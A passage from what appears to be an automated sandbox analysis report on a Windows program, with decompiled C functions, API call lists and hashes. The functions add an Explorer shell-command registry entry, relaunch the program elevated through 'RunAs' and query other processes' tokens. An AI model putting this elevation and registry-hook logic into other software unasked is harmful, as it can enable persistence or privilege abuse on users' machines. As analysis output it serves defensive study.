							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                                    0x00407763
                                                                                                                    0x0040776c
                                                                                                                    0x00407784
                                                                                                                    0x0040778b
                                                                                                                    0x00407797
                                                                                                                    0x00407799
                                                                                                                    0x0040779b
                                                                                                                    0x004077a7
                                                                                                                    0x004077ae
                                                                                                                    0x004077bd
                                                                                                                    0x004077c4
                                                                                                                    0x004077d3
                                                                                                                    0x004077da
                                                                                                                    0x004077e1
                                                                                                                    0x004077e6
                                                                                                                    0x004077f2
                                                                                                                    0x004077f5
                                                                                                                    0x00407804
                                                                                                                    0x00407805
                                                                                                                    0x00407810
                                                                                                                    0x00407812
                                                                                                                    0x00407813
                                                                                                                    0x00407818
                                                                                                                    0x00407818
                                                                                                                    0x00407825
                                                                                                                    0x0040782d
                                                                                                                    0x00407830
                                                                                                                    0x0040783a
                                                                                                                    0x00407840
                                                                                                                    0x00407846
                                                                                                                    0x00407849
                                                                                                                    0x00407850
                                                                                                                    0x0040785e
                                                                                                                    0x00407864
                                                                                                                    0x00407867
                                                                                                                    0x0040786b
                                                                                                                    0x0040786f
                                                                                                                    0x00407877
                                                                                                                    0x0040787a
                                                                                                                    0x00407885
                                                                                                                    0x00407892
                                                                                                                    0x004078a8
                                                                                                                    0x004078b8
                                                                                                                    0x004078c5
                                                                                                                    0x004078ff
                                                                                                                    0x004078c7
                                                                                                                    0x004078ca
                                                                                                                    0x004078dd
                                                                                                                    0x004078de
                                                                                                                    0x004078e3
                                                                                                                    0x004078e8
                                                                                                                    0x004078eb
                                                                                                                    0x004078f0
                                                                                                                    0x004078f0
                                                                                                                    0x00407906
                                                                                                                    0x00407909
                                                                                                                    0x0040790f
                                                                                                                    0x0040791d
                                                                                                                    0x00407923
                                                                                                                    0x0040792d
                                                                                                                    0x00407932
                                                                                                                    0x0040793b
                                                                                                                    0x00407942
                                                                                                                    0x00407943
                                                                                                                    0x0040794c
                                                                                                                    0x00407953
                                                                                                                    0x00407954
                                                                                                                    0x00407959
                                                                                                                    0x0040795c
                                                                                                                    0x00407961
                                                                                                                    0x0040796c
                                                                                                                    0x00407971
                                                                                                                    0x0040797a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00407838
                                                                                                                    0x00407838
                                                                                                                    0x0040783a
                                                                                                                    0x00407980
                                                                                                                    0x0040798a
                                                                                                                    0x004079a1

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                    • API String ID: 1607361635-601624466
                                                                                                                    • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                    • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                    • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                    • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 40%
                                                                                                                    			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                    0x00407b65
                                                                                                                    0x00407b7c
                                                                                                                    0x00407b83
                                                                                                                    0x00407b91
                                                                                                                    0x00407b98
                                                                                                                    0x00407ba6
                                                                                                                    0x00407bad
                                                                                                                    0x00407bb2
                                                                                                                    0x00407bb9
                                                                                                                    0x00407bca
                                                                                                                    0x00407bcb
                                                                                                                    0x00407bd6
                                                                                                                    0x00407bdb
                                                                                                                    0x00407bdc
                                                                                                                    0x00407be1
                                                                                                                    0x00407be1
                                                                                                                    0x00407be8
                                                                                                                    0x00407bf9
                                                                                                                    0x00407bfa
                                                                                                                    0x00407c05
                                                                                                                    0x00407c0a
                                                                                                                    0x00407c0b
                                                                                                                    0x00407c1c
                                                                                                                    0x00407c21
                                                                                                                    0x00407c21
                                                                                                                    0x00407c2a
                                                                                                                    0x00407c2b
                                                                                                                    0x00407c36
                                                                                                                    0x00407c3b
                                                                                                                    0x00407c3c
                                                                                                                    0x00407c41
                                                                                                                    0x00407c51
                                                                                                                    0x00407c56
                                                                                                                    0x00407c5b
                                                                                                                    0x00407c65
                                                                                                                    0x00407c68
                                                                                                                    0x00407c6b
                                                                                                                    0x00407c74
                                                                                                                    0x00407c7b
                                                                                                                    0x00407c80
                                                                                                                    0x00407c82
                                                                                                                    0x00407c88
                                                                                                                    0x00407ca6
                                                                                                                    0x00407c8a
                                                                                                                    0x00407c8a
                                                                                                                    0x00407c8b
                                                                                                                    0x00407c96
                                                                                                                    0x00407c9b
                                                                                                                    0x00407c9c
                                                                                                                    0x00407ca1
                                                                                                                    0x00407ca1
                                                                                                                    0x00407cb3
                                                                                                                    0x00407cb4
                                                                                                                    0x00407cbd
                                                                                                                    0x00407cc4
                                                                                                                    0x00407cc5
                                                                                                                    0x00407cd0
                                                                                                                    0x00407cd5
                                                                                                                    0x00407cd6
                                                                                                                    0x00407cdb
                                                                                                                    0x00407ceb
                                                                                                                    0x00407cf0
                                                                                                                    0x00407cf3
                                                                                                                    0x00407cf3
                                                                                                                    0x00407cf3
                                                                                                                    0x00000000
                                                                                                                    0x00407cfc
                                                                                                                    0x00407d00

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                    • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                    • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                    • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                    • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 51%
                                                                                                                    			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                                    0x00404415
                                                                                                                    0x0040441d
                                                                                                                    0x0040442c
                                                                                                                    0x00404435
                                                                                                                    0x004045b3
                                                                                                                    0x004045b7
                                                                                                                    0x004045b7
                                                                                                                    0x0040444b
                                                                                                                    0x00404452
                                                                                                                    0x00404457
                                                                                                                    0x00404460
                                                                                                                    0x00404461
                                                                                                                    0x00404462
                                                                                                                    0x0040446d
                                                                                                                    0x00404472
                                                                                                                    0x00404473
                                                                                                                    0x00404490
                                                                                                                    0x004044a5
                                                                                                                    0x004044b4
                                                                                                                    0x004044b6
                                                                                                                    0x004044b7
                                                                                                                    0x004044bd
                                                                                                                    0x004044cf
                                                                                                                    0x004044db
                                                                                                                    0x004044eb
                                                                                                                    0x004044f1
                                                                                                                    0x004044f6
                                                                                                                    0x004044f9
                                                                                                                    0x004044fe
                                                                                                                    0x00404506
                                                                                                                    0x00404507
                                                                                                                    0x00404508
                                                                                                                    0x00404510
                                                                                                                    0x00404521
                                                                                                                    0x00404532
                                                                                                                    0x00404539
                                                                                                                    0x00404547
                                                                                                                    0x0040454e
                                                                                                                    0x0040455b
                                                                                                                    0x0040455c
                                                                                                                    0x00404564
                                                                                                                    0x0040456f
                                                                                                                    0x00404570
                                                                                                                    0x00404571
                                                                                                                    0x0040457c
                                                                                                                    0x0040457d
                                                                                                                    0x00404588
                                                                                                                    0x00404589
                                                                                                                    0x0040458a
                                                                                                                    0x004045a0
                                                                                                                    0x004045a5
                                                                                                                    0x00404521
                                                                                                                    0x004044eb
                                                                                                                    0x004045ab
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00404452
                                                                                                                    • _snwprintf.MSVCRT ref: 00404473
                                                                                                                      • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                      • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                      • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                    • memset.MSVCRT ref: 004044CF
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                    • memset.MSVCRT ref: 00404539
                                                                                                                    • memset.MSVCRT ref: 0040454E
                                                                                                                    • _snwprintf.MSVCRT ref: 00404571
                                                                                                                    • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                      • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                    • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                    • API String ID: 486436031-734527199
                                                                                                                    • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                    • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                    • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                    • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 87%
                                                                                                                    			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                    0x00406466
                                                                                                                    0x0040647d
                                                                                                                    0x00406484
                                                                                                                    0x00406499
                                                                                                                    0x004064a0
                                                                                                                    0x004064af
                                                                                                                    0x004064b4
                                                                                                                    0x004064bb
                                                                                                                    0x004064cd
                                                                                                                    0x004064d2
                                                                                                                    0x004064d4
                                                                                                                    0x004064e4
                                                                                                                    0x004064ea
                                                                                                                    0x004064ea
                                                                                                                    0x004064f3
                                                                                                                    0x00406503
                                                                                                                    0x00406514
                                                                                                                    0x00406525
                                                                                                                    0x0040653b
                                                                                                                    0x0040654e
                                                                                                                    0x00406568
                                                                                                                    0x00406572
                                                                                                                    0x0040657a
                                                                                                                    0x00406582
                                                                                                                    0x0040658a
                                                                                                                    0x00406596

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00406484
                                                                                                                    • memset.MSVCRT ref: 004064A0
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                      • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                      • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                      • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                      • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                      • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                      • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                      • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                    • wcscpy.MSVCRT ref: 004064E4
                                                                                                                    • wcscpy.MSVCRT ref: 004064F3
                                                                                                                    • wcscpy.MSVCRT ref: 00406503
                                                                                                                    • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                    • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                    • wcscpy.MSVCRT ref: 0040657A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                    • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                    • API String ID: 3037099051-2314623505
                                                                                                                    • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                    • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                    • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                    • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68);
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}












                                                                                                                    0x00401c31
                                                                                                                    0x00401c33
                                                                                                                    0x00401c48
                                                                                                                    0x00401c4f
                                                                                                                    0x00401c61
                                                                                                                    0x00401c68
                                                                                                                    0x00401c74
                                                                                                                    0x00401c79
                                                                                                                    0x00401c7a
                                                                                                                    0x00401c7b
                                                                                                                    0x00401c84
                                                                                                                    0x00401c89
                                                                                                                    0x00401c8e
                                                                                                                    0x00401c8f
                                                                                                                    0x00401c9b
                                                                                                                    0x00401ca6
                                                                                                                    0x00401caf
                                                                                                                    0x00401cb9
                                                                                                                    0x00401cc0
                                                                                                                    0x00401cc7
                                                                                                                    0x00401cce
                                                                                                                    0x00401cd5
                                                                                                                    0x00401cdd
                                                                                                                    0x00401ce0
                                                                                                                    0x00401d14
                                                                                                                    0x00401ce2
                                                                                                                    0x00401ce8
                                                                                                                    0x00401cf3
                                                                                                                    0x00401cfe
                                                                                                                    0x00401d09
                                                                                                                    0x00401d09
                                                                                                                    0x00401cfe
                                                                                                                    0x00401d1b

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                    • memset.MSVCRT ref: 00401C4F
                                                                                                                    • memset.MSVCRT ref: 00401C68
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                    • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                    • memset.MSVCRT ref: 00401C9B
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                    • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                                                                    • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                    • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                    • API String ID: 903100921-3385179869
                                                                                                                    • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                    • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                    • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                    • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 44%
                                                                                                                    			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
